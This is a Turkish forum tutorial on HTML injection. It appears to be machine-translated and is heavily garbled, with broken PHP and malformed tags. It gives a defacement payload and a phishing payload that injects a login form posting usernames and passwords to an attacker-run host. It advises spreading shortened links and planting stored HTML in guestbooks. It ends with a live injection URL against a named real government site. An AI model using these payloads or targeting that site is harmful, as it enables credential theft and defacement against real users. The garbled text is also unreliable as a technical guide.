Merhaba Arkadaşlar , Bugun Sizlere "HTML İnjection" Anlaticam
[ 0x01 ] HTML Enjeksiyon:
aynı zamanda "sanal tahrifat" olarak bilinen köprü metni biçimlendirme dili (HTML) enjeksiyon, kullanıcı kullanıcı girişi alanları ile web uygulaması HTML kodu enjekte izin bir uygulama üzerinde bir saldırıdır. Web uygulama düzgün kullanıcılardan gelen istekleri ele almak mümkün değilse, bir saldırganın bir parametre değeri ile kendi geçerli HTML kodu arz ve sunucuya isteği doğrulamak için uygulama alabilirsiniz. Iki saldırı aslında aynı şey ama HTML enjeksiyon, sayfayı değiştirmek için basit HTML etiketleri kullanarak oysa bir XSS saldırısı ile bir saldırı vektörü olarak Java script ve komut dosyası etiketlerini gönderiyor çünkü bazen HTML Enjeksiyon de XSS HTML Enjeksiyon olarak adlandırılır . [ 0x02 ] Sadece Defacing? Tamam bu kadar çok insan HTML Enjeksiyon gerçek tehlike hafife hacker toplumda. Ayrıca saldırganların yerine sadece "Seni kesmek!" Demek için bir sayfanın içeriğini düzenleme daha tam potansiyeline saldırı kaldıraç yok. Hiçbir zarar verir gibi burada buz burg sadece ucu. HTML Enjeksiyon phishing, gizli bir java sürücü içerebilir oluşturulan kötü niyetli sayfalara yol açabilir, dağıtılmış ddos saldırıları vardır java tabanlı ve kötü niyetli site, orta tarama gibi çatlama saldırıları şu tarayıcınız üzerinden kendi gitmek dağıtılan, tarayıcı üzerinden çalıştırmak site scripting, gizli tarayıcı açıkları, sığır ağlar, gizli kötü amaçlı yazılım, bitcoin madencilik, ve çok daha fazlası. Bunlar sadece en bu saldırı ne kadar tehlikeli sadece habersiz olduğu için saldırganların bile yaptığını düşünmek asla şeyler vardır. Bu saldırının senaryo doğru kaldıraçlı ediliyor: [ * .] Saldıran Sosyal Ağ Sitesi HTML Ekleme Güvenlik Açığı bulur [ * .] Saldıran el sanatları kötü niyetli link ve bu kodlar, onun HTML kodu içeren ve kullanıcılara gönderir [ * ] Kullanıcı ziyaret sayfa, nedeniyle güvenilir olan etki. [ * ] Kullanıcı habersiz kodlanmış bağlantı Ziyaretler, bağlantı, sayfa giriş yönlendirir (saldırgan tarafından hazırlanmış oldu phishing sayfa) [ * ] Kullanıcı kimlik bilgilerini girer ve saldırganın giriş bilgi kapmak. [ * ] Saldıran şimdi vardır oturumların nab binlerce potansiyel, etkili çatlama için kelime listeleri gibi şifreler kullanın ve temsilcisi bir sürü almak, spam satmak. [ 0x03 ] Saldırı: Savunmasız Uygulama Kodu:
Kod:
<Php?
$ username = $ _REQUEST ['username'];
?>
<html>
<title> üye arama </ title>
! <h1> CHF Hoşgeldiniz </ h1>
<br>
<body>
? <için arama php echo $ username;?>
</ body>
</ html>[ * ] Üzgünüz yoksul kodu, ben aramak için bir kullanıcı adı girmek için kullanılan var bir arama kutusu olduğunu hayal sadece bir kullanıcı girişi alan eklemek ama sağlar yoktu. Yani giriş alanına Ben "DES" girin. Ben arama butonuna bastıktan sonra URL şu şekilde görünecektir.
Kod:
http://www.chf.com/membersearch.php?username=DES[ * ] bizim kod bakalım. Sayfa membersearch.php denir bu url vardır neden parametresi 'kullanıcı adı' kadar şu ister? Username = ve giriş alanına girilen ne olursa olsun daha sonra sayfaya geri (basılı) yankılandı $ kullanıcı adı değişken olarak ayarlanır. Yani DES için arama sonra, sayfa DES aranıyor demeliyim!. Bu, ne olursa olsun bizim giriş alanına girdi ve $ username değişkeni sayfaya yazdırılır olarak ayarlanır anlamına gelir iyidir. Peki bizim? Username = sonra HTML kodunu girin ve sunucu doğrular olmadığını görmek için çalışıyorum hakkında.
Kod:
DES </ b> Hacked by http://www.chf.com/membersearch.php?username = <br> <b>[ * ] Bu iki yeni hat başlangıç ve şimdi kalın harflerle sayfamızı üzerinde olacak ..
Kod:
Için arama DES tarafından Hacked![ 0x04 ] Phishing Örnek:
Ben hesap phish istedim Yukarıdaki örnekte ki. ! Biraz okunaklı görünmesi için - Evet bir <ile enjeksiyon noktadan sonra sayfanın geri kalanı açýklama sonra, enjekte HTML işlemek bir giriş formu sunmak, ve bir bağlantı zanaat gerekir.
Kod:
http://www.chf.com/membersearch.php?username = <h3> Devam için Kullanıcı adınız ve şifreniz Giriniz: </ h3> <form method = "POST"
action = "http://DES-phish. com / login.txt "> Kullanıcı Adı: <input type="text" name="username" /> <br /> Şifre: <input type =" parola "
name = "parola" /> <br /> <input type = "Gönder" value = "Giriş" /> </ form> <! -[ * ] Bu yüzden şimdi, bu bağlantıyı kodlamak onu kısaltmak ve daha sonra kullanıcılara forum veya web sayfası etrafında gönderin. Sonra kullanıcı adları ve şifreleri benim phishing bağlantı teslim zaman, değerleri gönderilir http://DES-phish.com/login.txt POST üzerinden ve giriş. [ 0x05 ] Kalıcı ve OLMAYAN Kalıcı: Sadece XSS gibi, HTML Enjeksiyon kalıcı ve OLMAYAN kalıcı olabilir. Kalıcı HTML Enjeksiyon çok nadir olmak. Kalıcı HTML Enjeksiyon yerine sadece bir bağlantı ile saklanabilir web sayfanın içine kötü niyetli kod göndermek için güçlü olmak ile, kalıcı XSS olan aynı şekilde elde edilir. Bu, birçok konuk kitap, ya da bir yazı ya da ne olursa olsun bir yorum bırakabilirsiniz yerlerde söz mümkün olabilir. Sadece sayfa savunmasız olduğundan emin olun, ve bir yorum veya posta gibi kötü niyetli HTML kodu göndermek. Öyleyse tüm insanların yapmak zorunda bağlantıyı ziyaret edin ve daha etkili phishing yapabilirsiniz veya kullanıcılar da tahrif veya sizin için bu saldırı kullanmak ne olursa olsun görmek var. [ 0x06 ] Canlı Örnek: Ulusal Jeofizik Veri Merkezi HTML Enjeksiyon. Hatta Büyük siteler bu saldırıya karşı savunmasız. (Aynı parametre üzerinde XSS için Ayrıca Vulý, ve SQLi.)
Kod:
http://www.ngdc.noaa.gov/hazard/quiz/jsp/quiz/kq.jsp?htype = <b> DES @ CHF </ b>
